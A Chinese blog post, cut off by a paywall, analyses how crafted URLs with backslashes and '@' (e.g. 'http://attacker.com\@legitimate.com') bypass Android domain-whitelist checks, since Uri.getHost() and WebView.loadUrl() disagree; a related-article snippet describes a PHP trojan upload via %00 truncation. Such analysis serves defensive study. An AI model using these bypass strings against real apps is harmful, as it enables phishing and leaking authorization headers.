绕过Android域名白名单校验的方法

最新推荐文章于 2022-05-23 20:14:20 发布
最新推荐文章于 2022-05-23 20:14:20 发布
阅读量1k 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq771888143/article/details/97997356
版权
本文探讨了Android组件中域名白名单校验的常见安全风险,通过实例展示了如何通过URL构造和反射调用来绕过校验,影响包括Android 6及以下系统的设备。建议开发者对传入的Uri对象进行`parse()`处理后再进行安全性检查。
摘要由CSDN通过智能技术生成

引言
很多 Android 组件都有响应外部链接的能力,如果攻击者能随意的指定这些组件所响应的 url,轻则可以引导被攻击的 APP 弹出钓鱼页面,重则可能远程执行恶意 js 代码。因此 APP 开发者必然要对传入的 url 进行校验,而设置域名白名单就是一种简单常见且具有较高安全性的防御方法。

然而由于一些开发者并不完全通晓调用方法的底层特性,使得看起来万无一失的白名单校验形同虚设。本文列举几种常见的 Android 域名白名单校验写法,并深入源码指出其中存在的风险和绕过方法。

一、 Url加入反斜杠”\”
1.1. 方法描述
先来看一种典型的域名校验写法:

/* Uri 结构

  • [scheme:][//authority][path][?query][#fragment]
    */
    [check_v1]
    Uri uri = Uri.parse(attackerControlledString);
    if (“legitimate.com”.equals(uri.getHost()) || uri.getHost().endsWith(".legitimate.com")) {
    webView.loadUrl(attackerControlledString, getAuthorizationHeaders());
    // or webView.loadUrl(uri.toString())
    }
    然而…

String url = “http://attacker.com\.legitimate.com/smth”;
Log.d(“getHost:”, Uri.parse(url).getHost()); // 输出 attacker.com.legitimate.com !
if (Uri.parse(url).getHost().endsWith(".legitimate.com")) {
webView.loadUrl(url, getAuthorizationHeaders()); // 成功加载 attacker.com
}
可以看到 getHost() 和 loadUrl() 的表现不一致,if检验跳转目标是legitimate.com但执行时浏览器会把反斜线纠正为正斜线去访问attacker.com。那么如果是用 equals() 来做完整的 host 检验该怎么办呢?只需加一个‘@’就能隔断非法前缀。

String url = “http://attacker.com\@legitimate.com/smth”;
Log.d(“Wow”, Uri.parse(url).getHost()); // 输出 legitimate.com!
webView.loadUrl(url, getAuthorizationHeaders()); // 加载 attacker.com
1.2. 分析原因
看来android.net.Uri的 parse() 是有安全缺陷的,我们扒拉一下代码定位问题…

[frameworks/base/core/java/android/net/Uri.java]
public static Uri parse(String uriString) {
return new StringUri(uriString);
}
继续看这个内部类StringUri

[frameworks/base/core/java/android/net/Uri.java]
private static class StringUri extends AbstractHierarchicalUri {

private StringUri(String uriString) {
this.uriString = uriString;
}

private Part getAuthorityPart() {
if (authority == null) {
String encodedAuthority
= parseAuthority(this.uriString, findSchemeSeparator());
return authority = Part.fromEncoded(encodedAuthority);
}
return authority;
}

static String parseAuthority(String uriString, int ssi) {
int length = uriString.length();
// If “//” follows the scheme separator, we have an authority.
if (length > ssi + 2
&& uriString.charAt(ssi + 1) == ‘/’
&& uriString.charAt(ssi + 2) == ‘/’) {
// We have an authority.
// Look for the start of the path, query, or fragment, or the
// end of the string.
int end = ssi + 3;
LOOP: while (end < length) {
switch (uriString.charAt(end)) {
case ‘/’: // Start of path
case ‘?’: // Start of query
case ‘#’: // Start of fragment
break LOOP;
}
end++;
}
return uriString.substring(ssi + 3, end);
} else {
return null;
}
}
}
这里就明显看到StringUri没有对authority部分做反斜杠的识别处理, 接着找StringUri的父类AbstractHierarchicalUri瞧瞧:

[frameworks/base/core/java/android/net/Uri.java]
private abstract static class AbstractHierarchicalUri extends Uri {
private String parseUserInfo() {
String authority = getEncodedAuthority();
int end = authority.indexOf(’@’);
return end == NOT_FOUND ? null : authority.substring(0, end);
}

private String parseHost() {
String authority = getEncodedAuthority();
// Parse out user info and then port.
int userInfoSeparator = authority.indexOf(’@’);
int portSeparator = authority.indexOf(’:’, userInfoSeparator);
String encodedHost = portSeparator == NOT_FOUND
? authority.substring(userInfoSeparator + 1)
: authority.substring(userInfoSeparator + 1, portSeparator);
return decode(encodedHost);
}
}
就在

最低0.47元/天 解锁文章
qq771888143
关注
【漏洞挖掘】——78、白名单检测绕过
最新发布
Fly_鹏程万里
06-12 203
从以上代码中可以看到此处对文件的Type进行了检查,只允许image/jpeg、image/png、image/gif三种格式,而且直接为服务器端校验,对于服务端的这种校验方式我们可以通过BP抓包来更改content-Type为其允许的类型即可。这里采用白名单判断,但是$img_path直接拼接,所以可以先上传一个符合白名单检测的jpg文件之后在BP中使用%00截断保存路径即可绕过检测,最后保存一个php类型的木马文件。采用白名单检查而且这里的保存路径直接拼接可以使用0x00截断来绕过
[车联网安全自学篇] Android安全之绕过直连、HOST校验、系统证书校验、代理检测、双向认证抓HTTPS数据
橙留香Park的博客
05-13 1391
如果是你客户端,你需要拿到服务器的证书,并放到你的信任库中如果是服务端,你要生成私钥和证书,并将这两个放到你的密钥库中,并且将证书发给所有客户端。如果你是客户端,你要生成客户端的私钥和证书,将它们放到密钥库中,并将证书发给服务端,同时,在信任库中导入服务端的证书如果你是服务端,除了在密钥库中保存服务器的私钥和证书,还要在信任库中导入客户端的证书。...
如何合理绕过域名开关类的安卓网络验证
Qiled的博客
06-04 986
如何合理绕过域名开关类的安卓网络验证 小胖个人博客:www.zhuoyue360.com 原文链接:http://www.zhuoyue360.com/index.php/archives/21/ 交流群:348355266 今天有一个需求,逆向某违法APK,分析其的工作原理.由于样本不便提供,这里只提供部分代码. private String mSerial = "123"; int id = view.getId(); if (id == R.id.adb_view) { Reque
android 过滤cmcc,03-URL过滤命令
weixin_39962199的博客
05-26 447
1URL过滤add命令用来向URL过滤策略中添加黑/白名单规则。undo add命令用来删除URL过滤策略中指定的或所有黑/白名单规则。【命令】add { blacklist | whitelist } [ id] host { regex host-regex | text host-name } [ uri { regex uri-regex | text uri-name } ]undo a...
Android DSN之查询域名处理: res_search
九天小哥的专栏
09-18 2105
res_nsearch() /* * Formulate a normal query, send, and retrieve answer in supplied buffer. * Return the size of the response on success, -1 on error. * If enabled, implement search rules until answ...
android.net.Uri 简介 API
weixin_33852020的博客
07-29 742
android.net.Uri 简介public abstract class android.net.Uri extends Object implements Parcelable, Comparable&lt;Uri&gt;Immutable URI reference. A URI reference includes a URI and a fragment, the component...
Android APP安全测试Checklist
热门推荐
Adam的博客
12-08 7万+
前言此文档旨在大家提供Android平台APP安全风险与漏洞相关的一般性Checklist,保障安全评估测试的基础质量与效率。配置安全发布状态检查该类漏洞的审查场景:发布的代码未启用代码混淆、未关闭调试模式、未关闭不必要的日志输出、或者含有内网IP地址等信息漏洞类型说明:发布状态检查:如果APP未启用代码混淆或者其他抵抗分析的机制,或者在AndroidManifest.xml中定义了android...
Android漏洞与安全总结
u012523122的专栏
02-27 7434
一.Activity 漏洞 越权绕过漏洞 原理:        没有对调用activity的组件进行权限验证,就会造成验证的安全问题。 防护: 1.      私有activity是相对安全的,设置exported为false。 2.      公开activity应:谨慎处理接收的intent;返回数据不应包含敏感信息;不应发送敏感信息;收到返回数据时谨慎处理。   钓鱼欺诈劫...
Android学习笔记:Android基础知识点(不断更新中)
浩比的专栏
10-28 2万+
1、Android系统的四大组件分别是:活动(Activity)、服务(Service)、广播接收器(Broadcast Receiver)、内容提供器(Content Provider)。 2、定义一个应用程序名的字符串,有以下两种方式来引用它:
手机如何添加域名白名单_腾讯企业邮箱邮件列表白名单设置方法?
weixin_29123181的博客
01-12 1453
商务合作伙伴经常收到腾讯企业邮箱邮件群组账号退信,这个邮件群组中的所有邮箱无法收到邮件,由于收到退信方是群发邮件,一封邮件要发给很多个邮箱,腾讯企业邮箱系统判断为垃圾邮件,直接拒收,这就耽误事了,都无法收到对方邮件。 如果是单独发给个人的邮箱而退信,可以通过网页版登录设置个人邮箱的白名单,放行对方的邮件,不再拒收,设置方法如下:设置后的效果如下: 如果有更多个,逐个添加进去就可以了,可以是单个邮箱...
Uri.Authority 和 Uri.Host 之间的区别?
qq_26810645的博客
06-21 3837
webview白名单
白龙的博客
05-23 1587
1.添加白名单验证的时机 1.loadurl 2.shouldOverRideUrlLoading 3.如果需要对白名单进行安全等级划分,还需要在JavascriptInterface中加入校验函数,JavascriptInterface中需要使用webview.getUrl()来获取webview当前所在域 风险提示: 上面这些都做了还有可能被攻击,比如白名单中的服务器存在XSS漏洞,或者白名单中的服务器被攻击者控制,或者webview访问没有采用安全的传输通道导致被中间人劫持等,都可以在白名单信任域中注
Android中 使用 java.net.URI 与 android.net.Uri 的区别
nbaqqqq的专栏
01-05 4538
转载:http://blog.sina.com.cn/s/blog_4e1e357d0101f10t.html 使用URI时,建立uri对象时,发现应该使用 URI mServiceUrl =URI.create(schemeUrl); 该URI来自 java.net 而不是使用Uri,Uri是来自android.net.Uri; 使用URI可以方便的getHost,g
Android知识点-Uri解析异常——This isn‘t a hierarchical URI.
半寿翁的博客
07-22 4755
  在开发中,总会遇到各种好玩的事,比如与H5交互的时候解析一个uri,比如前面刚发过的scheme的页面跳转——(如果看不可以百度一下什么是scheme页面跳转,说有个url不合规,但是没说明哪条,已经替换,但不敢确定能不能通过)。而在我满心欢喜去调用的时候,却直接崩溃了,错误信息就是——“This isn’t a hierarchical URI.”,含义就是这个uri不合规,天知道运营为什么会配出来这么个鬼东西让我解析。但是boss说:“运营配错了,我去骂运营,但是你崩溃了,我就得来骂你!”   仔细
Android下基于Iptables的一种app网络访问控制方案(一)
@甘道夫@的专栏
12-04 1万+
1.什么是Iptable? 百度百科对于Iptables有详细的介绍。简单地说,Iptables是Linux内核提供的一套IP信息包过滤系统,对外由Iptables命令提供设置过滤规则的入口。 Android是基于Linux的操作系统,支持Iptables。执行Iptables命令需要root权限。   2.如何配置Iptables命令链? 假设一个安卓系统网络访问管理体系,需要针对不同
android 验证URL是否合法
cui_boke的博客
11-22 3663
Patterns.WEB_URL.matcher(URL).matches(),中间填入 需要验证的URl地址,合法返回true,不合法返回false; 这种方法只能验证URL是否合法,而不能验证URl是否可以进入 或者使用~
手机如何添加域名白名单_苹果手机如何添加或删除桌面小组件?一教你就会
weixin_32758601的博客
01-15 1356
iphone苹果手机在桌面上可以添加一些小组件,其实也是一种快速方式,方便快速使用,前提是在手机里存在的应用软件, 并且这些小组件也是可以添加或删除的,那么具体如何操作呢,接下来看教程。步骤一:打开iPhone苹果手机,进入到主界面,向右滑动界面,然后就会显示小组件的桌面,点击界面上的编辑选项。步骤二:接着就会进入到widget小组件界面,界面上部有个红圈标识的就是当前已经存在的小组件,下方绿圈标...
springboot设施白名单跳过token校验
07-27
在`preHandle`方法中,我们判断请求的URL是否在白名单中,如果在则直接返回true,跳过Token校验;否则,执行Token校验的逻辑代码。 注意:上述代码只是一种实现方式,具体根据你的项目需求进行调整。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值